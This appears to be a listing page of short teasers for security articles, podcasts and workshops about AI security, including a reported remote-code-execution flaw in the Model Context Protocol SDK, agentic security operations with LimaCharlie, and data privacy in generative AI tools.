Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

You're Not Watching MCPs. Anthropic's Vulnerability Shows Why You Should Be.

Last week, researchers at OX Security published findings that should stop every security leader in their tracks. They discovered a critical vulnerability baked directly into Anthropic's Model Context Protocol SDK, affecting every supported language: Python, TypeScript, Java, and Rust. The result: remote code execution on any system running a vulnerable MCP implementation, with direct access to sensitive user data, internal databases, API keys, and chat histories. Over 7,000 publicly accessible servers.

AI SecOps Worskhop Series: Accelerating Cloud Security Operations with Claude Code and LimaCharlie

In this workshop we will show how to use Claude Code with LimaCharlie to accelerate cloud security operations. We will have Claude Code deploy agents, create detections and identify issues before they become incidents. This hands-on workshop is designed to demonstrate the transformative power of integrating Anthropic's Claude Code, with the versatile security platform, LimaCharlie. Our focus will be on leveraging the capabilities of Claude Code to significantly accelerate and streamline various aspects of cloud security operations, turning reactive tasks into proactive, automated workflows.

Logging Is Not Observability: The AI Security Gap MSSPs Can't Ignore

Every MSSP is fielding the same question from clients right now:"Are we safe with AI?" Most are answering with some version of"yes, we're logging everything." In a recent Defender Fridays episode, Saurabh Shintre, Founder and CEO of Realm Labs drew a hard line between these two concepts."You can log prompt and response and this bare minimum you have to do.

Defending at Machine Speed in the Autonomous Age

Frontier AI models are accelerating the discovery of new vulnerabilities combined with the ability to exploit those weaknesses at speed and scale. This alone isn’t the problem. Trust in AI‑driven security outcomes is. With AI dominating headlines, security leaders are asking what models like Mythos or GPT‑5.4‑Cyber mean for their business. The real issue runs deeper. Teams need to be able to trust tools and technology that move at machine speed.

Beyond the Prompt: Data Security in Generative AI Platforms

Generative AI tools have changed how people work and play online. Everyone is excited about the speed and creativity these systems offer. Users often type sensitive info into prompts without thinking about where it goes. Security experts worry about how these platforms handle personal data. It is easy to forget that anything typed into a public bot might be stored. Staying safe means knowing how to use these tools without giving away secrets.

MyClaw Detailed Review: Is This OpenClaw Managed Hosting Worth It?

I've been working in the AI tools space for a while now, and one thing that comes up repeatedly is the gap between open-source AI frameworks and the actual effort required to run them. OpenClaw is a great example - powerful, flexible, and genuinely useful for building AI agents. But getting it deployed and keeping it running? That's a different story. That's what led me to try MyClaw AI. Here's an honest look at what the platform actually offers, who it's for, and whether it's worth the cost.

Building Know Your Agent: The missing identity layer for agentic commerce

AI agents are being deployed in the real world at pace. In the enterprise realm, they’re accessing APIs, shipping code, and running decisioning workflows on behalf of the organizations and individuals who deploy them. Entirely new businesses have sprung up, leveraging AI agents to streamline customer support and sales processes.

LimaCharlie is the most secure way to run AI security agents

The idea that AI agents will run security operations is becoming reality. But most platforms ignore the most important question: how do you secure the agents themselves? In this video I walk through why LimaCharlie is the most secure platform for running agentic security operations and demonstrate the architectural controls that make it possible. We look at the core mechanisms that allow AI agents to operate safely inside a SecOps environment, including.

Agentic AI at risk after MCP design flaw discovery? #ai #cybersecurity #podcast

In this week's Intel Chat, Chris Luft and Matt Bromiley discuss a design flaw in Anthropic's Model Context Protocol (MCP) that could enable large-scale supply chain attacks on agentic AI systems. Researchers at OX Security found that MCP's command execution allows malicious commands to run silently without sanitization checks or warnings.